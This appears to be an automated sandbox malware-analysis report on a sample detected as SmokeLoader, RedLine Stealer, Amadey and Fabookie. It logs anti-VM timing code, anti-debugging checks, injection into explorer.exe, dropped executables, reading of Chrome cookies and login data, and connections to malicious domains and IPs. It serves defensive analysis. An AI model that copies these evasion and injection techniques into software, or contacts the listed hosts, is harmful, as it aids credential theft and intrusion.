Source: C:\Users\user\AppData\Local\Temp\2A57.exe RDTSC instruction interceptor: First address: 00000001405E24DC second address: 00000001405E255F instructions: 0x00000000 rdtsc 0x00000002 setle dh 0x00000005 not dl 0x00000007 inc ecx 0x00000008 push edx 0x00000009 pushfd 0x0000000a dec eax 0x0000000b mov edx, 00000000h 0x00000010 add byte ptr [eax], al 0x00000012 add byte ptr [eax], al 0x00000014 inc cx 0x00000016 bswap ecx 0x00000018 dec ecx 0x00000019 not eax 0x0000001b push edx 0x0000001c cwde 0x0000001d dec esp 0x0000001e mov eax, dword ptr [esp+00000090h] 0x00000025 inc eax 0x00000026 xchg bl, dh 0x00000028 inc ax 0x0000002a movsx esi, ch 0x0000002d inc ecx 0x0000002e not eax 0x00000030 inc ecx 0x00000031 inc eax 0x00000033 cmc 0x00000034 cmovnp ax, ax 0x00000038 inc ecx 0x00000039 ror eax, 03h 0x0000003c inc ecx 0x0000003d cmp ah, ah 0x0000003f inc ecx 0x00000040 add eax, 7BE95E8Eh 0x00000046 bt bx, cx 0x0000004a inc eax 0x0000004b sub dh, FFFFFFA5h 0x0000004e inc eax 0x0000004f shl dh, cl 0x00000051 dec ebp 0x00000052 lea eax, dword ptr [eax+edx] 0x00000055 dec eax 0x00000056 mov esi, 00000000h 0x0000005b add dword ptr [eax], eax 0x0000005d add byte ptr [eax], al 0x0000005f dec ecx 0x00000060 sbb ebx, ebx 0x00000062 dec esp 0x00000063 add eax, esi 0x00000065 bt edx, 33h 0x00000069 dec esp 0x0000006a mov ecx, esp 0x0000006c dec eax 0x0000006d not eax 0x0000006f dec eax 0x00000070 sub esp, 00000180h 0x00000076 xchg eax, edx 0x00000077 bt ax, FFB2h 0x0000007c dec eax 0x0000007d and esp, FFFFFFF0h 0x00000083 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EAA.exe RDTSC instruction interceptor: First address: 00000001405E24DC second address: 00000001405E255F instructions: 0x00000000 rdtsc 0x00000002 setle dh 0x00000005 not dl 0x00000007 inc ecx 0x00000008 push edx 0x00000009 pushfd 0x0000000a dec eax 0x0000000b mov edx, 00000000h 0x00000010 add byte ptr [eax], al 0x00000012 add byte ptr [eax], al 0x00000014 inc cx 0x00000016 bswap ecx 0x00000018 dec ecx 0x00000019 not eax 0x0000001b push edx 0x0000001c cwde 0x0000001d dec esp 0x0000001e mov eax, dword ptr [esp+00000090h] 0x00000025 inc eax 0x00000026 xchg bl, dh 0x00000028 inc ax 0x0000002a movsx esi, ch 0x0000002d inc ecx 0x0000002e not eax 0x00000030 inc ecx 0x00000031 inc eax 0x00000033 cmc 0x00000034 cmovnp ax, ax 0x00000038 inc ecx 0x00000039 ror eax, 03h 0x0000003c inc ecx 0x0000003d cmp ah, ah 0x0000003f inc ecx 0x00000040 add eax, 7BE95E8Eh 0x00000046 bt bx, cx 0x0000004a inc eax 0x0000004b sub dh, FFFFFFA5h 0x0000004e inc eax 0x0000004f shl dh, cl 0x00000051 dec ebp 0x00000052 lea eax, dword ptr [eax+edx] 0x00000055 dec eax 0x00000056 mov esi, 00000000h 0x0000005b add dword ptr [eax], eax 0x0000005d add byte ptr [eax], al 0x0000005f dec ecx 0x00000060 sbb ebx, ebx 0x00000062 dec esp 0x00000063 add eax, esi 0x00000065 bt edx, 33h 0x00000069 dec esp 0x0000006a mov ecx, esp 0x0000006c dec eax 0x0000006d not eax 0x0000006f dec eax 0x00000070 sub esp, 00000180h 0x00000076 xchg eax, edx 0x00000077 bt ax, FFB2h 0x0000007c dec eax 0x0000007d and esp, FFFFFFF0h 0x00000083 rdtsc
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 2328 Thread sleep count: 645 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4460 Thread sleep count: 250 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 2152 Thread sleep count: 211 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 2824 Thread sleep count: 486 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4636 Thread sleep count: 112 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 3492 Thread sleep count: 88 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 645 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 486 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\EB37.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9763.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B03C.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\A28F.exe Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: explorer.exe, 00000001.00000000.331472438.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.567344648.0000000000824000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW[;
Source: explorer.exe, 00000001.00000000.317714700.000000000091F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.368088384.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000001.00000000.368088384.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 2A57.exe, 00000008.00000003.557817185.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.617175126.00000000005D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW w
Source: ECFD.exe, 00000009.00000002.646270742.0000000000786000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8
Source: explorer.exe, 00000001.00000000.391524561.00000000043B0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: EAA.exe, 0000000C.00000003.555840925.0000000002475000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0%
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.567344648.0000000000824000.00000004.00000020.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.619137126.0000000000724000.00000004.00000020.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.368088384.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: ECFD.exe, 00000009.00000002.646270742.0000000000786000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: explorer.exe, 00000001.00000000.331472438.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: 2A57.exe, 00000008.00000003.525039609.00000000005D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging
barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\file.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe System information queried: CodeIntegrityInformation Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0060092B mov eax, dword ptr fs:[00000030h] 0_2_0060092B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00600D90 mov eax, dword ptr fs:[00000030h] 0_2_00600D90
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_005F092B mov eax, dword ptr fs:[00000030h] 6_2_005F092B
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_005F0D90 mov eax, dword ptr fs:[00000030h] 6_2_005F0D90
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_007CC56A push dword ptr fs:[00000030h] 6_2_007CC56A
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Process queried: DebugPort Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: kkh.eiwagggg.com
Source: C:\Windows\explorer.exe Domain query: keziheritier.com
Source: C:\Windows\explorer.exe Domain query: github.com
Source: C:\Windows\explorer.exe Domain query: furubujjul.net
Source: C:\Windows\explorer.exe Domain query: pelegisr.com
Source: C:\Windows\explorer.exe Domain query: www.rukangiralawchambers.org
Source: C:\Windows\explorer.exe Domain query: avtlsgosecure.com
Source: C:\Windows\explorer.exe Network Connect: 45.138.74.52 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 179.43.163.115 80 Jump to behavior
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: A28F.exe.1.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\ECFD.exe Memory written: C:\Users\user\AppData\Local\Temp\ECFD.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\file.exe Thread created: C:\Windows\explorer.exe EIP: 2901ACC Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Thread created: unknown EIP: 5291A80 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: F9F380 Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\explorer.exe Memory written: PID: 3624 base: F9F380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 5300 base: 7FF69BD28150 value: 90 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\ECFD.exe Process created: C:\Users\user\AppData\Local\Temp\ECFD.exe C:\Users\user\AppData\Local\Temp\ECFD.exe Jump to behavior
Source: explorer.exe, 00000001.00000000.322842452.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.333336819.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.317880270.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.317880270.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.389174458.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.360247280.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
Source: explorer.exe, 00000001.00000000.317880270.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.389174458.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.360247280.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.317880270.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.389174458.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.360247280.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.359379247.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.388189782.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.317378275.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_00417429
Source: C:\Users\user\Desktop\file.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num, 0_2_004124E8
Source: C:\Users\user\Desktop\file.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_00411E7A
Source: C:\Users\user\Desktop\file.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 0_2_004116A0
Source: C:\Users\user\Desktop\file.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA, 0_2_0040A737
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 4_2_00417429
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num, 4_2_004124E8
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 4_2_00411E7A
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 4_2_004116A0
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA, 4_2_0040A737
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 6_2_00417429
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num, 6_2_004124E8
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 6_2_00411E7A
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 6_2_004116A0
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA, 6_2_0040A737
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 0.3.file.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.tfgatra.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.tfgatra.5a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.600e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.305829321.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Fabookie
Source: Yara match File source: Process Memory Space: 2A57.exe PID: 4476, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 0.3.file.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.tfgatra.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.tfgatra.5a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.600e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.305829321.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Fabookie
Source: Yara match File source: Process Memory Space: 2A57.exe PID: 4476, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 722349 Sample: file.exe Startdate: 13/10/2022 Architecture: WINDOWS Score: 100 51 en.xml-post.xyz 2->51 53 keziheritier.com 2->53 55 9 other IPs or domains 2->55 73 Snort IDS alert for network traffic 2->73 75 Multi AV Scanner detection for domain / URL 2->75 77 Malicious sample detected (through community Yara rule) 2->77 81 10 other signatures 2->81 9 file.exe 2->9         started        12 tfgatra 2->12         started        14 udgatra 2->14         started        signatures3 79 Performs DNS queries to domains with low reputation 51->79 process4 signatures5 99 Detected unpacking (changes PE section rights) 9->99 101 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 9->101 103 Maps a DLL or memory area into another process 9->103 107 2 other signatures 9->107 16 explorer.exe 23 9->16 injected 105 Machine Learning detection for dropped file 12->105 process6 dnsIp7 45 rukangiralawchambers.org 198.23.58.153 STEADFASTUS United States 16->45 47 179.43.163.115, 49698, 80 PLI-ASCH Panama 16->47 49 9 other IPs or domains 16->49 37 C:\Users\user\AppData\Roaming\udgatra, PE32 16->37 dropped 39 C:\Users\user\AppData\Roaming\tfgatra, PE32 16->39 dropped 41 C:\Users\user\AppData\Local\Temp\F4FD.exe, PE32 16->41 dropped 43 11 other malicious files 16->43 dropped 65 System process connects to network (likely due to code injection or exploit) 16->65 67 Benign windows process drops PE files 16->67 69 Injects code into the Windows Explorer (explorer.exe) 16->69 71 3 other signatures 16->71 21 F4FD.exe 16->21         started        24 2A57.exe 16->24         started        27 EAA.exe 16->27         started        29 6 other processes 16->29 file8 signatures9 process10 dnsIp11 83 Detected unpacking (changes PE section rights) 21->83 85 Machine Learning detection for dropped file 21->85 87 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 21->87 97 3 other signatures 21->97 57 star-mini.c10r.facebook.com 157.240.17.35 FACEBOOKUS United States 24->57 59 www.facebook.com 24->59 89 Antivirus detection for dropped file 24->89 91 Tries to detect virtualization through RDTSC time measurements 24->91 61 157.240.20.35 FACEBOOKUS United States 27->61 63 www.facebook.com 27->63 93 Tries to harvest and steal browser information (history, passwords, etc) 29->93 95 Injects a PE file into a foreign processes 29->95 31 WerFault.exe 7 29->31         started        33 WerFault.exe 3 29->33         started        35 ECFD.exe 29->35         started        signatures12 process13
  • No. of IPs < 25%
